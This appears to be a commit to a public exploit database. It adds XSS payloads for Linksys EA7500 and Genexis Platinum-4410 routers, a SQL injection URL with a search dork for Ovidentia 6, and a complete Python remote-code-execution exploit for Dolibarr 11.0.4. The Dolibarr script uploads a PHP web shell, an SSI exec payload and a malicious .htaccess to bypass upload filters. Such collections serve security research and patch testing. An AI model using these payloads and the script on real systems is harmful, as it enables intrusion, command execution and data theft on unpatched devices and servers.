DB: 2021-03-26

4 changes to exploits/shellcodes Ovidentia 6 - 'id' SQL injection (Authenticated) Linksys EA7500 2.0.8.194281 - Cross-Site Scripting Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
2021-03-26 05:01:58 +00:00 · 2021-03-26 05:01:58 +00:00 · 06a83531de
commit 06a83531de
parent 2f2c713a12
5 changed files with 270 additions and 0 deletions
--- a/exploits/hardware/webapps/49708.txt
+++ b/exploits/hardware/webapps/49708.txt
@ -0,0 +1,23 @@
+# Exploit Title: Linksys EA7500 2.0.8.194281 - Cross-Site Scripting 
+# Date: 3/24/21
+# Exploit Author: MiningOmerta
+# Vendor Homepage: https://www.linksys.com/
+# Version: EA7500 Firmware Version: 2.0.8.194281
+# CVE: CVE-2012-6708
+# Tested On: Linksys EA7500 (jQuery version 1.7.1)
+
+# Cross-Site Scripting Vulnerability on modern versions of Linksys Smart-Wifi home routers. 
+# Caused by outdated jQuery(strInput) version : <= 1.7.1  (Fixed in version 1.9.0)
+# Credit also to Reddit user michael1026
+
+###
+POC
+###
+
+1. When logging into the router (http://LHOST or http://LHOST:10080), choose "Click Here" 
+   next to "Dont Have an Account? " or Choose "click here" after "To login with your Linksys Smart Wi-Fi account", 
+   you will be redirected with a login prompt with both Email Address and Password forms. 
+
+2. Make your email address "<img src=0 onerror=alert(XSS)>" without the double quotes. 
+
+3. Payload will be triggered when mouse is clicked anywhere within the Email Address form box or when form is submitted.
--- a/exploits/hardware/webapps/49709.txt
+++ b/exploits/hardware/webapps/49709.txt
@ -0,0 +1,20 @@
+# Exploit Title: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
+# Date: 03/25/2020
+# Exploit Author: Jithin KS
+# Vendor Homepage: https://www.gxgroup.eu/ont-products/
+# Version: Platinum-4410 Software version - P4410-V2-1.31A
+# Tested on: Windows 10
+# Author Contact: hhttps://twitter.com/jithinks_8<https://twitter.com/amalmohandas0>
+
+Vulnerability Details
+======================
+Genexis Platinum-4410 Home Gateway Unit is vulnerable to stored XSS in the "start_addr" parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users.
+
+How to reproduce
+===================
+1. Login to the firmware as any user
+2. Navigate to Manage tab--> Security Management
+3. Enter any valid value in Start Source Address and fill all other fields. Click Add.
+4. Capture this request in Burp Suite. Enter payload <script>alert(1)</script> in "start_addr" text box and forward the request.
+5. Relogin as any user and again navigate to Manage tab--> Security Management
+6. Observe the XSS popup showing persistent XSS
--- a/exploits/php/webapps/49707.txt
+++ b/exploits/php/webapps/49707.txt
@ -0,0 +1,7 @@
+# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
+# Exploit Author: Felipe Prates Donato (m4ud)
+# Vendor Homepage: http://www.ovidentia.org
+# Version: 6
+# DORK : "Powered by Ovidentia"    
+
+http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
--- a/exploits/php/webapps/49711.py
+++ b/exploits/php/webapps/49711.py
@ -0,0 +1,216 @@
+# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
+# Date: 16/06/2020
+# Exploit Author: Andrea Gonzalez
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://github.com/Dolibarr/dolibarr
+# Version: Prior to 11.0.5
+# Tested on: Debian 9.12 
+# CVE : CVE-2020-14209
+
+#!/usr/bin/python3
+
+# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested. 
+
+import re
+import sys
+import random
+import string
+import argparse
+import requests
+import urllib.parse
+from urllib.parse import urlparse
+
+session = requests.Session()
+base_url = "http://127.0.0.1/htdocs/"
+documents_url = "http://127.0.0.1/documents/"
+proxies = {}
+user_id = -1
+
+class bcolors:
+    BOLD = '\033[1m'
+    HEADER = '\033[95m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+
+def printc(s, color):
+    print(f"{color}{s}{bcolors.ENDC}")
+    
+def read_args():
+    parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.')
+    parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.')
+    parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).')
+    parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").')
+    parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.')
+    parser.add_argument('--extension-bypass', dest='fbypass', action='store_true',
+                        default=False,
+                        help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.')
+    parser.add_argument('--file-renaming', dest='frenaming', action='store_true',
+                        default=False,
+                        help='A PHP script is uploaded and .php extension is added using file renaming function.')
+    parser.add_argument('--htaccess', dest='htaccess', action='store_true',
+                        default=False,
+                        help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.')
+    required = parser.add_argument_group('required named arguments')
+    required.add_argument('-u', '--user', help='Username', required=True)
+    required.add_argument('-p', '--password', help='Password', required=True)
+    return parser.parse_args()
+    
+def error(s, end=False):
+    printc(s, bcolors.HEADER)
+    if end:
+        sys.exit(1)
+    
+"""
+    Returns user id
+"""
+def login(user, password):
+    data = {
+        "actionlogin": "login",
+        "loginfunction": "loginfunction",
+        "username": user,
+        "password": password
+    }
+    login_url = urllib.parse.urljoin(base_url, "index.php")
+    r = session.post(login_url, data=data, proxies=proxies)
+    try:
+        regex = re.compile(r"user/card.php\?id=(\d+)")
+        match = regex.search(r.text)
+        return int(match.group(1))
+    except Exception as e:
+        #error(e)
+        return -1
+
+def upload(filename, payload):
+    files = {
+        "userfile": (filename, payload),
+    }
+    data = {
+        "sendit": "Send file"
+    }
+    headers = {
+        "Referer": base_url
+    }
+    upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+    session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies)
+
+def delete(filename):
+    data = {
+        "action": "confirm_deletefile",
+        "confirm": "yes",
+        "urlfile": filename
+    }
+    headers = {
+        "Referer": base_url
+    }
+    delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+    session.post(delete_url, headers=headers, data=data, proxies=proxies)
+    
+def rename(filename, new_filename):
+    data = {
+        "action": "renamefile",
+        "modulepart": "user",
+        "renamefilefrom": filename,
+        "renamefileto": new_filename,
+        "renamefilesave": "Save"
+    }
+    headers = {
+        "Referer": base_url
+    }
+    rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+    session.post(rename_url, headers=headers, data=data, proxies=proxies)
+    
+def test_payload(filename, payload, query, headers={}):
+    file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query))
+    r = session.get(file_url, headers=headers, proxies=proxies)
+    if r.status_code != 200:
+        error("Error %d %s" % (r.status_code, file_url))
+    elif payload in r.text:
+        error("Non-executable %s" % file_url)
+    else:
+        printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN)
+        return True
+    return False
+
+def get_random_filename():
+    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
+
+def upload_executable_file_php(payload, query):
+    php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"]
+    random_filename = get_random_filename()
+    b = False
+    for extension in php_extensions:
+        filename = random_filename + extension
+        upload(filename, payload)
+        if test_payload(filename, payload, query):
+            b = True
+    return b
+
+def upload_executable_file_ssi(payload, command):
+    filename = get_random_filename() + ".shtml"
+    upload(filename, payload)
+    return test_payload(filename, payload, '', headers={'ACCEPT': command})
+
+def upload_and_rename_file(payload, query):
+    filename = get_random_filename() + ".php"
+    upload(filename, payload)
+    rename(filename + ".noexe", filename)
+    return test_payload(filename, payload, query)
+
+def upload_htaccess(payload, query):
+    filename = get_random_filename() + ".noexe"
+    upload(filename, payload)
+    filename_ht = get_random_filename() + ".htaccess"
+    upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n")
+    delete(".htaccess")
+    rename(filename_ht, ".htaccess")
+    return test_payload(filename, payload, query)
+
+
+if __name__ == "__main__":
+    args = read_args()
+    base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/'
+    documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/")
+    documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/'
+    user = args.user
+    password = args.password
+    payload = "<?php system($_GET['cmd']) ?>"
+    payload_ssi = '<!--#exec cmd="$HTTP_ACCEPT" -->'
+    command = args.cmd
+    query = "cmd=%s" % command
+    if args.proxy:
+        proxies = {"http": args.proxy, "https": args.proxy}
+
+    user_id = login(user, password)
+    if user_id < 0:
+        error("Login error", True)
+    printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN)
+    print('-' * 30)
+    if not args.fbypass and not args.frenaming and not args.htaccess:
+        args.fbypass = args.frenaming = args.htaccess = True
+
+    if args.fbypass:
+        printc("Trying extension-bypass method\n", bcolors.BOLD)
+        b = upload_executable_file_php(payload, query)
+        b = upload_executable_file_ssi(payload_ssi, command) or b
+        if b:
+            printc("\nextension-bypass was successful", bcolors.OKBLUE)
+        else:
+            printc("\nextension-bypass was not successful", bcolors.WARNING)
+        print('-' * 30)
+    if args.frenaming:
+        printc("Trying file-renaming method\n", bcolors.BOLD)
+        if upload_and_rename_file(payload, query):
+            printc("\nfile-renaming was successful", bcolors.OKBLUE)
+        else:
+            printc("\nfile-renaming was not successful", bcolors.WARNING)
+        print('-' * 30)
+    if args.htaccess:
+        printc("Trying htaccess method\n", bcolors.BOLD)
+        if upload_htaccess(payload, query):
+            printc("\nhtaccess was successful", bcolors.OKBLUE)
+        else:
+            printc("\nhtaccess was not successful", bcolors.WARNING)
+        print('-' * 30)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43174,6 +43174,7 @@ id,file,description,date,author,type,platform,port
 48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
 48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
 48393,exploits/php/webapps/48393.py,"Open-AudIT Professional 3.3.1 - Remote Code Execution",2020-04-29,Askar,webapps,php,
+49707,exploits/php/webapps/49707.txt,"Ovidentia 6 - 'id' SQL injection (Authenticated)",2021-03-25,"Felipe Prates Donato",webapps,php,
 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,
@ -43888,4 +43889,7 @@ id,file,description,date,author,type,platform,port
 49699,exploits/php/webapps/49699.txt,"MyBB 1.8.25 - Poll Vote Count SQL Injection",2021-03-23,SivertPL,webapps,php,
 49700,exploits/php/webapps/49700.txt,"Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS",2021-03-23,"Jitendra Kumar Tripathi",webapps,php,
 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",2021-03-23,WangYihang,webapps,multiple,
+49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
+49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
+49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,